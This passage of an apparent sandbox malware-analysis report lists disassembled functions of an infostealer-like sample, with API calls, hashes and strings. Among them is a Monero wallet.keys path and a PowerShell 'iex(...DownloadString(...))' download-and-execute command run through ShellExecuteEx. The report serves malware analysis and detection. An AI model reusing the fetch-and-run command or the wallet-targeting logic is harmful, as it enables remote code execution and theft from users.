                              • Opcode Fuzzy Hash: 659080bab9bec201c31265cdfd1194e38f31055c820bd7b2ebe8745532dbc877
                              • Instruction Fuzzy Hash: 05014BB5A14309BBEB10EBE4EC49FBEB7BCEB48B01F104454FB04D7691E6B499018B56
                              Function 009F7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F773B
                              • RegOpenKeyExA.ADVAPI32(80000002,013ABAB8,00000000,00020119,009F76B9), ref: 009F775B
                              • RegQueryValueExA.ADVAPI32(009F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 009F777A
                              • RegCloseKey.ADVAPI32(009F76B9), ref: 009F7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: a058f07772c0cdff64b950307a3acd9aab5b675fd52276ba8049aa387e7b4ae4
                              • Instruction ID: 22c6bc14eac742b51a7afbcc531f1297acc8c682f286e3233ba7e8daa2ce0983
                              • Opcode Fuzzy Hash: a058f07772c0cdff64b950307a3acd9aab5b675fd52276ba8049aa387e7b4ae4
                              • Instruction Fuzzy Hash: F30162B5A50308BBDB10DBE0DC4AFBEB7B8EB48700F104558FB05A72C1DB70AA018B51
                              Function 009F40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 009F40D5
                              • RegOpenKeyExA.ADVAPI32(80000001,013BD3D8,00000000,00020119,?), ref: 009F40F4
                              • RegQueryValueExA.ADVAPI32(?,013BDA28,00000000,00000000,00000000,000000FF), ref: 009F4118
                              • RegCloseKey.ADVAPI32(?), ref: 009F4122
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4147
                              • lstrcat.KERNEL32(?,013BDA58), ref: 009F415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 849e709530236313baa043ca7177ef5244737bd7bc3e226a242e6c847cf72fcf
                              • Instruction ID: 693e0e2950580ec84ba902a095ec348964542da3589715b0c82a36e5a0081321
                              • Opcode Fuzzy Hash: 849e709530236313baa043ca7177ef5244737bd7bc3e226a242e6c847cf72fcf
                              • Instruction Fuzzy Hash: 48417AB6D10108ABDB25EBA0DC46FFE737DAB88300F408558B71656181EE759B898B92
                              Function 009E99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                              • LocalFree.KERNEL32(009E148F), ref: 009E9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 7d735ed42d941d7d66ec739b67c689e81fb7899601a349885538056593577f36
                              • Instruction ID: 9d2ac9d68676a004596f1e2978eb6ffc696f3bad01056a08066dea15f78b9d7c
                              • Opcode Fuzzy Hash: 7d735ed42d941d7d66ec739b67c689e81fb7899601a349885538056593577f36
                              • Instruction Fuzzy Hash: 8D311AB4A00209EFDF25CF95D985BAE77B9FF48340F108168E915A7290D778AE41CFA1
                              Function 009FC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 84268b1ad298be141965cb09840faa80c05a9f29c4795f6405255f78dbacafda
                              • Instruction ID: dde0d97991ba85ab3273650200a911997b3d2f2319e593d62762c1ed6dfff324
                              • Opcode Fuzzy Hash: 84268b1ad298be141965cb09840faa80c05a9f29c4795f6405255f78dbacafda
                              • Instruction Fuzzy Hash: 734109B110075C5EDB218B24CE84FFB7BED9F45704F1484E8EACA86182D2719A84CF20
                              Function 009F4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,013BDA10), ref: 009F47DB
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4801
                              • lstrcat.KERNEL32(?,?), ref: 009F4820
                              • lstrcat.KERNEL32(?,?), ref: 009F4834
                              • lstrcat.KERNEL32(?,013AB090), ref: 009F4847
                              • lstrcat.KERNEL32(?,?), ref: 009F485B
                              • lstrcat.KERNEL32(?,013BD098), ref: 009F486F
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009F8D90: GetFileAttributesA.KERNEL32(00000000,?,009E1B54,?,?,00A0564C,?,?,00A00E1F), ref: 009F8D9F
                                • Part of subcall function 009F4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009F4580
                                • Part of subcall function 009F4570: RtlAllocateHeap.NTDLL(00000000), ref: 009F4587
                                • Part of subcall function 009F4570: wsprintfA.USER32 ref: 009F45A6
                                • Part of subcall function 009F4570: FindFirstFileA.KERNEL32(?,?), ref: 009F45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 586a93dae123e6c764739c1792895929a7b7c6363e59f3db7f182b3eccaa1a6f
                              • Instruction ID: e2a18aa806067e540de0e06401faf1af181c3640ca81748fc9efb3e8110293dd
                              • Opcode Fuzzy Hash: 586a93dae123e6c764739c1792895929a7b7c6363e59f3db7f182b3eccaa1a6f
                              • Instruction Fuzzy Hash: CB3152B691020CA7CB64F7A0DC85FFE737CAB98700F404989B31996091EEB4D6C98B95
                              Function 009F2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F2D85
                              Strings
                              • ')", xrefs: 009F2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 009F2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 009F2D04
                              • <, xrefs: 009F2D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: bdd8892b12d404737b64f86a6d6e3dd43819624a4cd4000e0d409fda0daf2560
                              • Instruction ID: dd68069fc90e05308d4c63021c77f11b73846e97cc057e6ddde78c788115707a
                              • Opcode Fuzzy Hash: bdd8892b12d404737b64f86a6d6e3dd43819624a4cd4000e0d409fda0daf2560
                              • Instruction Fuzzy Hash: FD41DEB1C1020C9ADB14FBA0D891FFDB778AF50340F508529E60AB6195DFB46A4ACF95
                              Function 009E9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 009E9F41
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 7fd7b61b614f23b814510594a2eef70a89741877e2aa803ede93bb4313ca5198
                              • Instruction ID: a4d2412cd751410a9624f7ba339de1f8dae6cfd55a7c574b95324b7dac8ca5cd
                              • Opcode Fuzzy Hash: 7fd7b61b614f23b814510594a2eef70a89741877e2aa803ede93bb4313ca5198
                              • Instruction Fuzzy Hash: B6613D70A1024CEBDB24EFA5DC96FED7775AF85340F008518FA0A5B191EB746E06CB92
                              Function 009F6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 009F696C
                              • sscanf.NTDLL ref: 009F6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009F69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009F69C0
                              • ExitProcess.KERNEL32 ref: 009F69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 17d1dbb232d87ecc6f432e4bb35f9d44c423cc1e7fdc54f50cf6bc0e20de2081
                              • Instruction ID: f7c88c56ad898810eeea9a2be7d84991a68a886c51effb0223502d4cc43cee1c
                              • Opcode Fuzzy Hash: 17d1dbb232d87ecc6f432e4bb35f9d44c423cc1e7fdc54f50cf6bc0e20de2081
                              • Instruction Fuzzy Hash: 6521BAB5D1420DABCF14EFE4D945AEEB7B9FF48300F04852AE506E3250EB749605CB69
                              Function 009F7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,013AB968,00000000,00020119,?), ref: 009F7E5E
                              • RegQueryValueExA.ADVAPI32(?,013BD058,00000000,00000000,000000FF,000000FF), ref: 009F7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 009F7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 02f06138fff38b358333d12940d01ec407fb7aa692641ea8db018d444cd32c1a
                              • Instruction ID: 12030fba642e6abda3c07835d29880e4d7522a40f0a7ec895a018394ba16b9ec
                              • Opcode Fuzzy Hash: 02f06138fff38b358333d12940d01ec407fb7aa692641ea8db018d444cd32c1a
                              • Instruction Fuzzy Hash: 68118CB1A44209EBD714CFD4DD4AFBFBBB8EB08B10F10411AF705A7690D77858018BA1
                              Function 009F9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(013BDAA0,?,?,?,009F140C,?,013BDAA0,00000000), ref: 009F926C
                              • lstrcpyn.KERNEL32(00C2AB88,013BDAA0,013BDAA0,?,009F140C,?,013BDAA0), ref: 009F9290
                              • lstrlen.KERNEL32(?,?,009F140C,?,013BDAA0), ref: 009F92A7
                              • wsprintfA.USER32 ref: 009F92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
